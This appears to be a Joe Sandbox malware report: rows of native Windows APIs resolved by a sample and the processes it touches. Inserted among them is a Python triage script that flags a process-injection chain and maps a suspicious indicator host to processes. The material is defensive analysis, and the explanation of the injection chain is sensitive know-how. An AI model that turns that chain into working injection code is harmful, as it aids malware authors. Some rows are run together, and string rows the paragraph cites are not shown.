                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00E09576 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00E0953A GetWindowLongW,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D897C0 GetParent,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D8997D NtdllDialogWndProc_W,GetSysColor,SetBkColor,745EC8D0,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00E09EF3 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00E09E74 NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00E09F86 GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042CBE3 NtClose
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72B60 NtClose,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C735C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C74340 NtSetContextThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C74650 NtSuspendThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72BE0 NtQueryValueKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72BF0 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72BA0 NtEnumerateValueKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72AD0 NtReadFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72AF0 NtWriteFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72FE0 NtCreateFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72FB0 NtResumeThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72F30 NtCreateSection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72EE0 NtQueueApcThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72E80 NtReadVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72DD0 NtDelayExecution
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72D10 NtMapViewOfSection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72D30 NtUnmapViewOfSection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72CA0 NtQueryInformationToken
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72C60 NtCreateKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C73090 NtSetValueKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C73010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C739B0 NtGetContextThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C73D70 NtOpenThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C73D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D4340 NtSetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D4650 NtSuspendThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2B60 NtClose,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2BA0 NtEnumerateValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2BE0 NtQueryValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2AF0 NtWriteFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2AD0 NtReadFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2F30 NtCreateSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2FB0 NtResumeThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2FE0 NtCreateFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2E80 NtReadVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2EE0 NtQueueApcThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2D30 NtUnmapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2D10 NtMapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2DD0 NtDelayExecution,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2C60 NtCreateKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2CA0 NtQueryInformationToken,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D35C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D39B0 NtGetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D3010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D3090 NtSetValueKey
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D3D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D3D70 NtOpenThread
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_02AB9730 NtCreateFile
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_02AB9A30 NtClose
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_02AB9BA0 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_02AB98A0 NtReadFile
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_02AB9990 NtDeleteFile
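The Nt* rows above for svchost.exe (process 1) and ROUTE.EXE (process 6) resolve NtAllocateVirtualMemory, NtWriteVirtualMemory, NtMapViewOfSection, NtQueueApcThread, NtSetContextThread and NtResumeThread in the same process, which is the native API footprint of writing a payload into another process and then forcing one of its threads to run it by APC or context hijack. The string rows further up attach the hosts found in each process's memory, among them http://www.mzkd6gp5.top/0hqe/ in sUcUmdUxGfN.exe. The Python script below is an added triage helper, not part of the Joe Sandbox report or of the analysed sample: it parses report rows of those two shapes, flags a process only when its Nt* set covers every stage of that chain, and maps each host to the processes whose memory held it. The sample rows are constructed from the rows in this report (same process indices, paths, addresses and API names), with the ROUTE.EXE set cut down to two entries so that one process shows the negative case; the complete ROUTE.EXE rows above do cover the chain. The grouping of APIs into stages is an assumption of this example, not a Joe Sandbox signature.

```python
import re
from collections import defaultdict

# Stage table: an assumption of this example, not a Joe Sandbox rule. A process is
# flagged only when it resolves at least one API from every stage, so a process that
# merely reads or writes memory (a debugger, a crash reporter) is not reported.
INJECTION_STAGES = {
    "allocate": {"NtAllocateVirtualMemory", "NtCreateSection", "NtMapViewOfSection"},
    "write": {"NtWriteVirtualMemory", "NtMapViewOfSection"},
    "execute": {"NtQueueApcThread", "NtSetContextThread", "NtResumeThread", "NtCreateThreadEx"},
}

# Row shapes as they appear in the report:
#   Source: <process path> | Code function: <pid>_<n>_<addr> <api,api,...>
#   Source: <process>, <memory dump id> | String found in binary or memory: <string>
# The "|" is optional so rows whose columns were run together still parse.
FUNC_ROW = re.compile(
    r"Source:\s*(?P<src>.+?)\s*\|?\s*Code function:\s*(?P<pid>\d+)_\d+_[0-9A-Fa-f]+\s*(?P<rest>.*)$"
)
# "Nt" followed by an upper-case letter: matches NtQueueApcThread but not the
# user32 thunk NtdllDialogWndProc_W that the AutoIt rows are full of.
NT_API = re.compile(r"\bNt[A-Z]\w*")
URL_RE = re.compile(r"""https?://[^\s"'<>)]+""")

# Constructed sample rows (values copied from the report; ROUTE.EXE trimmed on purpose).
SAMPLE_ROWS = r"""
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72BF0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72D10 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C74340 NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72FB0 NtResumeThread
Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_032D2E30 NtWriteVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_02AB9730 NtCreateFile
Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D7BF40
Source: sUcUmdUxGfN.exe, 00000007.00000002.3015655468.00000000014B4000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.mzkd6gp5.top/0hqe/
Source: ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
"""


def process_key(src, pid):
    """Stable key such as '1:svchost.exe' from the source path and the report's process index."""
    name = re.split(r"[\\/]", src)[-1]
    return f"{int(pid)}:{name}"


def native_apis_by_process(rows):
    """Map each process to the set of Nt* APIs the report attributes to it."""
    apis = defaultdict(set)
    for line in rows.splitlines():
        m = FUNC_ROW.search(line)
        if m:
            apis[process_key(m["src"], m["pid"])].update(NT_API.findall(m["rest"]))
    return dict(apis)


def injection_candidates(rows):
    """Return {process: sorted injection-relevant APIs} for processes covering every stage."""
    stage_apis = set().union(*INJECTION_STAGES.values())
    hits = {}
    for proc, apis in native_apis_by_process(rows).items():
        if all(apis & members for members in INJECTION_STAGES.values()):
            hits[proc] = sorted(apis & stage_apis)
    return hits


def hosts_by_process(rows):
    """Map each host in a 'String found in binary or memory' row to the processes holding it."""
    hosts = defaultdict(set)
    for line in rows.splitlines():
        if "String found in binary or memory:" not in line:
            continue
        src = line.split("Source:", 1)[1].split(",", 1)[0].strip()
        for url in URL_RE.findall(line):
            host = url.split("://", 1)[1].split("/", 1)[0].lower()
            hosts[host].add(src)
    return {h: sorted(p) for h, p in hosts.items()}


if __name__ == "__main__":
    for proc, apis in injection_candidates(SAMPLE_ROWS).items():
        print(f"{proc}: injection chain via {', '.join(apis)}")
    for host, procs in sorted(hosts_by_process(SAMPLE_ROWS).items()):
        print(f"{host}: {', '.join(procs)}")
```

Run against the full report text, the script flags both svchost.exe and ROUTE.EXE; on the trimmed sample only svchost.exe is reported, and the host map leaves the judgement of which hosts are infrastructure (the search-engine and login.live.com strings come from a browser profile, the mzkd6gp5.top string does not) to the analyst.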
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DDD5EB CreateFileW,DeviceIoControl,CloseHandle
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DD1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,74735590,CreateProcessAsUserW,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DDE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D7BF40
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DE2046
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D78060
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DD8298
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DAE4FF
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DA676B
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00E04873
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D7CAF0
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D9CAA0
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D8CC39
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DA6DD9
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D791C0
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D8B119
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D91394
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D91706
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D9781B
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D919B0
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D8997D
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D77920
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D97A4A
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D97CA7
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D91C77
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DA9EEE
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DFBE44
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D91F32
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_01044850
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00418A93
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004011D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042F243
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402A5C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402A60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004022C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041028D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00410293
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040E493
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00416C9E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00416CA3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004104B3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040E5E3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040E5E8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402580
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D003E6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC02C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF81CC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF41A2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D001AA
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C30100
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3C7C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C64750
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5C6E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D00591
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CEE4F6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF2446
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE4420
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF6BD7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFAB40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D0A9A6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6E8F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C268B8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C428401_2_03C42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32FC81_2_03C32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBEFA01_2_03CBEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4F401_2_03CB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C82F281_2_03C82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60F301_2_03C60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE2F301_2_03CE2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFEEDB1_2_03CFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C52E901_2_03C52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFCE931_2_03CFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40E591_2_03C40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFEE261_2_03CFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3ADE01_2_03C3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C58DBF1_2_03C58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4AD001_2_03C4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDCD1F1_2_03CDCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30CF21_2_03C30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0CB51_2_03CE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40C001_2_03C40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8739A1_2_03C8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2D34C1_2_03C2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF132D1_2_03CF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5B2C01_2_03C5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE12ED1_2_03CE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5D2F01_2_03C5D2F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C452A01_2_03C452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4B1B01_2_03C4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7516C1_2_03C7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2F1721_2_03C2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0B16B1_2_03D0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEF0CC1_2_03CEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C470C01_2_03C470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF70E91_2_03CF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFF0E01_2_03CFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFF7B01_2_03CFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF16CC1_2_03CF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C856301_2_03C85630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D095C31_2_03D095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDD5B01_2_03CDD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF75711_2_03CF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C314601_2_03C31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFF43F1_2_03CFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB5BF01_2_03CB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7DBF91_2_03C7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5FB801_2_03C5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFB761_2_03CFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEDAC61_2_03CEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDDAAC1_2_03CDDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C85AA01_2_03C85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE1AA31_2_03CE1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFA491_2_03CFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF7A461_2_03CF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB3A6C1_2_03CB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C499501_2_03C49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5B9501_2_03C5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD59101_2_03CD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C438E01_2_03C438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAD8001_2_03CAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C03FD21_2_03C03FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C03FD51_2_03C03FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C41F921_2_03C41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFFB11_2_03CFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFF091_2_03CFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C49EB01_2_03C49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5FDC01_2_03C5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C43D401_2_03C43D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF1D5A1_2_03CF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF7D731_2_03CF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFCF21_2_03CFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB9C321_2_03CB9C32
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049C85725_2_049C8572
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049D0DD05_2_049D0DD0
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049D0DCB5_2_049D0DCB
